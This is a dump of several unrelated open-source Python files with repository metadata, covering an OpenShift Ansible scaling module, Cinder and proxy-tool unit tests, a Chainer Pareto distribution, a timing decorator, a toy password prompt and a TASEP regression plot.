kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False):
''' Constructor for OCScale '''
super(OCScale, self).__init__(namespace, kubeconfig=kubeconfig, verbose=verbose)
self.kind = kind
self.replicas = replicas
self.name = resource_name
self._resource = None
@property
def resource(self):
''' property function for resource var '''
if not self._resource:
self.get()
return self._resource
@resource.setter
def resource(self, data):
''' setter function for resource var '''
self._resource = data
def get(self):
'''return replicas information '''
vol = self._get(self.kind, self.name)
if vol['returncode'] == 0:
if self.kind == 'dc':
# The resource returned from a query could be an rc or dc.
# pylint: disable=redefined-variable-type
self.resource = DeploymentConfig(content=vol['results'][0])
vol['results'] = [self.resource.get_replicas()]
if self.kind == 'rc':
# The resource returned from a query could be an rc or dc.
# pylint: disable=redefined-variable-type
self.resource = ReplicationController(content=vol['results'][0])
vol['results'] = [self.resource.get_replicas()]
return vol
def put(self):
'''update replicas into dc '''
self.resource.update_replicas(self.replicas)
return self._replace_content(self.kind, self.name, self.resource.yaml_dict)
def needs_update(self):
''' verify whether an update is needed '''
return self.resource.needs_update_replicas(self.replicas)
# pylint: disable=too-many-return-statements
@staticmethod
def run_ansible(params, check_mode):
'''perform the idempotent ansible logic'''
oc_scale = OCScale(params['name'],
params['namespace'],
params['replicas'],
params['kind'],
params['kubeconfig'],
verbose=params['debug'])
state = params['state']
api_rval = oc_scale.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
#####
# Get
#####
if state == 'list':
return {'changed': False, 'result': api_rval['results'], 'state': 'list'} # noqa: E501
elif state == 'present':
########
# Update
########
if oc_scale.needs_update():
if check_mode:
return {'changed': True, 'result': 'CHECK_MODE: Would have updated.'} # noqa: E501
api_rval = oc_scale.put()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = oc_scale.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'result': api_rval['results'], 'state': 'present'} # noqa: E501
return {'changed': False, 'result': api_rval['results'], 'state': 'present'} # noqa: E501
return {'failed': True, 'msg': 'Unknown state passed. [{}]'.format(state)}
# -*- -*- -*- End included fragment: class/oc_scale.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: ansible/oc_scale.py -*- -*- -*-
def main():
'''
ansible oc module for scaling
'''
module = AnsibleModule(
argument_spec=dict(
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
state=dict(default='present', type='str', choices=['present', 'list']),
debug=dict(default=False, type='bool'),
kind=dict(default='dc', choices=['dc', 'rc'], type='str'),
namespace=dict(default='default', type='str'),
replicas=dict(default=None, type='int'),
name=dict(default=None, type='str'),
),
supports_check_mode=True,
)
rval = OCScale.run_ansible(module.params, module.check_mode)
if 'failed' in rval:
module.fail_json(**rval)
module.exit_json(**rval)
if __name__ == '__main__':
main()
# -*- -*- -*- End included fragment: ansible/oc_scale.py -*- -*- -*-
|
sosiouxme/openshift-ansible
|
roles/lib_openshift/library/oc_scale.py
|
Python
|
apache-2.0
| 66,630 | 0.001291 |
from unittest import TestLoader, TextTestRunner, TestSuite
from UnitTests.TableTest import TestTable
from UnitTests.DestinationTest import TestDestination
from UnitTests.CSVReaderTest import TestCSVReader
from UnitTests.ProxyExtractorTest import TestProxyExtractor
from UnitTests.NoProtocolTest import TestNoProtocol
from UnitTests.HttpProtocolTest import TestHttpProtocol
from UnitTests.ProxyTest import TestProxy
def run_tests():
suite_list = []
suite_list.append(TestLoader().loadTestsFromTestCase(TestTable))
suite_list.append(TestLoader().loadTestsFromTestCase(TestDestination))
suite_list.append(TestLoader().loadTestsFromTestCase(TestCSVReader))
suite_list.append(TestLoader().loadTestsFromTestCase(TestProxyExtractor))
suite_list.append(TestLoader().loadTestsFromTestCase(TestNoProtocol))
suite_list.append(TestLoader().loadTestsFromTestCase(TestHttpProtocol))
suite_list.append(TestLoader().loadTestsFromTestCase(TestProxy))
suite = TestSuite(suite_list)
TextTestRunner(verbosity=2).run(suite)
if __name__ == "__main__":
run_tests()
|
Valentijn1995/Kn0ckKn0ck
|
Kn0ckKn0ckTestSuite.py
|
Python
|
mit
| 1,092 | 0.000916 |
# Copyright (c) 2011 Zadara Storage Inc.
# Copyright (c) 2011 OpenStack Foundation
# Copyright 2011 University of Southern California
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for volume types extra specs code
"""
from cinder import context
from cinder import db
from cinder import test
class VolumeTypeExtraSpecsTestCase(test.TestCase):
def setUp(self):
super(VolumeTypeExtraSpecsTestCase, self).setUp()
self.context = context.get_admin_context()
self.vol_type1 = dict(name="TEST: Regular volume test")
self.vol_type1_specs = dict(vol_extra1="value1",
vol_extra2="value2",
vol_extra3=3)
self.vol_type1['extra_specs'] = self.vol_type1_specs
ref = db.volume_type_create(self.context, self.vol_type1)
self.addCleanup(db.volume_type_destroy, context.get_admin_context(),
self.vol_type1['id'])
self.volume_type1_id = ref.id
for k, v in self.vol_type1_specs.iteritems():
self.vol_type1_specs[k] = str(v)
self.vol_type2_noextra = dict(name="TEST: Volume type without extra")
ref = db.volume_type_create(self.context, self.vol_type2_noextra)
self.addCleanup(db.volume_type_destroy, context.get_admin_context(),
self.vol_type2_noextra['id'])
self.vol_type2_id = ref.id
def test_volume_type_specs_get(self):
expected_specs = self.vol_type1_specs.copy()
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_delete(self):
expected_specs = self.vol_type1_specs.copy()
del expected_specs['vol_extra2']
db.volume_type_extra_specs_delete(context.get_admin_context(),
self.volume_type1_id,
'vol_extra2')
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_update(self):
expected_specs = self.vol_type1_specs.copy()
expected_specs['vol_extra3'] = "4"
db.volume_type_extra_specs_update_or_create(
context.get_admin_context(),
self.volume_type1_id,
dict(vol_extra3=4))
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_create(self):
expected_specs = self.vol_type1_specs.copy()
expected_specs['vol_extra4'] = 'value4'
expected_specs['vol_extra5'] = 'value5'
db.volume_type_extra_specs_update_or_create(
context.get_admin_context(),
self.volume_type1_id,
dict(vol_extra4="value4",
vol_extra5="value5"))
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_get_with_extra_specs(self):
volume_type = db.volume_type_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs)
volume_type = db.volume_type_get(
context.get_admin_context(),
self.vol_type2_id)
self.assertEqual(volume_type['extra_specs'], {})
def test_volume_type_get_by_name_with_extra_specs(self):
volume_type = db.volume_type_get_by_name(
context.get_admin_context(),
self.vol_type1['name'])
self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs)
volume_type = db.volume_type_get_by_name(
context.get_admin_context(),
self.vol_type2_noextra['name'])
self.assertEqual(volume_type['extra_specs'], {})
def test_volume_type_get_all(self):
expected_specs = self.vol_type1_specs.copy()
types = db.volume_type_get_all(context.get_admin_context())
self.assertEqual(
types[self.vol_type1['name']]['extra_specs'], expected_specs)
self.assertEqual(
types[self.vol_type2_noextra['name']]['extra_specs'], {})
|
rakeshmi/cinder
|
cinder/tests/unit/test_volume_types_extra_specs.py
|
Python
|
apache-2.0
| 5,074 | 0 |
import chainer
from chainer.backends import cuda
from chainer import distribution
from chainer.functions.array import where
from chainer.functions.math import exponential
from chainer import utils
class Pareto(distribution.Distribution):
"""Pareto Distribution.
.. math::
f(x) = \\alpha x_m^{\\alpha}(x)^{-(\\alpha+1)},
Args:
scale(:class:`~chainer.Variable` or :ref:`ndarray`): Parameter of
distribution :math:`x_m`.
alpha(:class:`~chainer.Variable` or :ref:`ndarray`): Parameter of
distribution :math:`\\alpha`.
"""
def __init__(self, scale, alpha):
super(Pareto, self).__init__()
self.__scale = chainer.as_variable(scale)
self.__alpha = chainer.as_variable(alpha)
@property
def scale(self):
return self.__scale
@property
def alpha(self):
return self.__alpha
@property
def batch_shape(self):
return self.scale.shape
@property
def entropy(self):
return - exponential.log(self.alpha) + exponential.log(self.scale) \
+ 1. / self.alpha + 1.
@property
def event_shape(self):
return ()
@property
def _is_gpu(self):
return isinstance(self.scale.data, cuda.ndarray)
def log_prob(self, x):
x = chainer.as_variable(x)
logp = exponential.log(self.alpha) \
+ self.alpha * exponential.log(self.scale) \
- (self.alpha + 1) * exponential.log(x)
xp = logp.xp
return where.where(
utils.force_array(x.data >= self.scale.data),
logp, xp.array(-xp.inf, logp.dtype))
@property
def mean(self):
mean = (self.alpha * self.scale / (self.alpha - 1))
xp = mean.xp
return where.where(
self.alpha.data > 1,
mean, xp.array(xp.inf, mean.dtype))
def sample_n(self, n):
xp = cuda.get_array_module(self.scale)
if xp is cuda.cupy:
eps = xp.random.pareto(
self.alpha.data, (n,)+self.batch_shape, dtype=self.alpha.dtype)
else:
eps = xp.random.pareto(
self.alpha.data, (n,)+self.batch_shape
).astype(self.alpha.dtype)
noise = self.scale * (eps + 1)
return noise
@property
def support(self):
return '[scale, inf]'
@property
def variance(self):
var = self.scale ** 2 * self.alpha / (self.alpha - 1) ** 2 \
/ (self.alpha - 2)
xp = var.xp
return where.where(
self.alpha.data > 2,
var, xp.array(xp.inf, var.dtype))
@distribution.register_kl(Pareto, Pareto)
def _kl_pareto_pareto(dist1, dist2):
kl = dist2.alpha * (exponential.log(dist1.scale)
- exponential.log(dist2.scale)) \
+ exponential.log(dist1.alpha) - exponential.log(dist2.alpha) \
+ (dist2.alpha - dist1.alpha) / dist1.alpha
xp = kl.xp
return where.where(
dist1.scale.data >= dist2.scale.data,
kl, xp.array(xp.inf, kl.dtype))
|
ktnyt/chainer
|
chainer/distributions/pareto.py
|
Python
|
mit
| 3,069 | 0 |
print('What is the password?')
password = input()
if password == 'rosebud':
print('Access granted.')
if password != 'rosebud':
print('Access denied.')
print('Done.')
|
SafeW3rd/Ciphers
|
password.py
|
Python
|
mit
| 179 | 0.005587 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Ricardo Ribeiro"
__credits__ = ["Ricardo Ribeiro"]
__license__ = "MIT"
__version__ = "0.0"
__maintainer__ = "Ricardo Ribeiro"
__email__ = "ricardojvr@gmail.com"
__status__ = "Development"
import time
from datetime import datetime, timedelta
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time()
time_elapsed = datetime(1,1,1) + timedelta(seconds=(te-ts) )
print("%s: %d:%d:%d:%d;%d" % (method.__name__, time_elapsed.day-1, time_elapsed.hour, time_elapsed.minute, time_elapsed.second, time_elapsed.microsecond))
return result
return timed
|
sunj1/my_pyforms
|
pyforms/Utils/timeit.py
|
Python
|
mit
| 694 | 0.034582 |
import matplotlib.pyplot as plt
import numpy as np
from glob import glob
from scipy import stats
#p = 0.5
e = 0.1
qth = [25,50,75,90]
nomefile = './N*' + '_B*' + '_p=1su2L_e0.0.npy'
nomefile = glob(nomefile)
data = []
N = []
medie = []
mediane = []
massimi = []
perc = []
nomefile.sort(key=lambda x:int(x.split('_')[1][1:]))
'''
questo sort e' la ostia, Carlo tu avevi dimenticato l'int() e non
funzionava!
'''
for f in nomefile:
N.append(2*int(f.split('_')[1][1:]))
data.append(np.load(f))
medie.append(np.mean(data[-1]))
massimi.append(max(data[-1]))
mediane.append(np.median(data[-1]))
perc.append(np.percentile(data[-1], qth))
perc = np.array(perc)
perc= perc.T
xi = np.zeros(len(N))
for i in range(len(N)):
xi[i] = N[i] - 10
Eslope, Eintercept, Er_value, Ep_value, Estd_err = stats.linregress(xi, medie)
Mslope, Mintercept, Mr_value, Mp_value, Mstd_err = stats.linregress(xi, massimi)
MEDslope, MEDintercept, MEDr_value, MEDp_value, Mstd_err = stats.linregress(xi, mediane)
fig, (ax, bx, cx) = plt.subplots(ncols=3)
fig.suptitle('Coalescence Times for Parallel TASEP p=1/2L e=0.0', fontsize=18)
Eline = Eslope*xi + Eintercept
MEDline = MEDslope*xi + MEDintercept
Mline = Mslope*xi + Mintercept
ax.plot(N,Eline,'r-',N,medie,'o')
ax.set_ylabel('Mean of Coalescence Times', fontsize=15)
ax.set_xlabel('Number of Sites of the Ring')
ax.text(15,35, 'Slope = %f \nIntercept = %f' %(Eslope, Eintercept), fontsize=16)
bx.plot(N,MEDline,'r-',N,mediane,'x')
bx.set_ylabel('Median of Coalescence Times', fontsize=15)
bx.set_xlabel('Number of Sites of the Ring')
bx.text(15, 15, 'Slope = %f \nIntercept = %f' %(MEDslope, MEDintercept), fontsize=16)
cx.plot(N,Mline,'r-',N,massimi,'g^')
cx.text(15, 1000, 'Slope = %f \nIntercept = %f' %(Mslope, Mintercept), fontsize=16)
cx.set_ylabel('Max of Coalescence Times', fontsize=15)
cx.set_xlabel('Number of Sites of the Ring')
plt.show()
fig = plt.figure()
# for row, lab in zip(perc[::-1],qth[::-1]):
# plt.plot(N,row, label=lab)
# '''
# ho usato la extended slice syntax solo per avere la legenda in ordine decrescente
# '''
# plt.legend(loc=2, title= 'Percentiles')
# plt.ylabel('Values of Percentiles of Coalescence Times')
# plt.xlabel('Number of Sites of the Ring')
# plt.title('Percentiles of Coealescence Times of Parallel TASEP p0.5 e0.1')
# plt.show(fig)
|
clancia/TASEP
|
Sequential_TASEP/LinRegCTvsSize.py
|
Python
|
gpl-2.0
| 2,328 | 0.018041 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.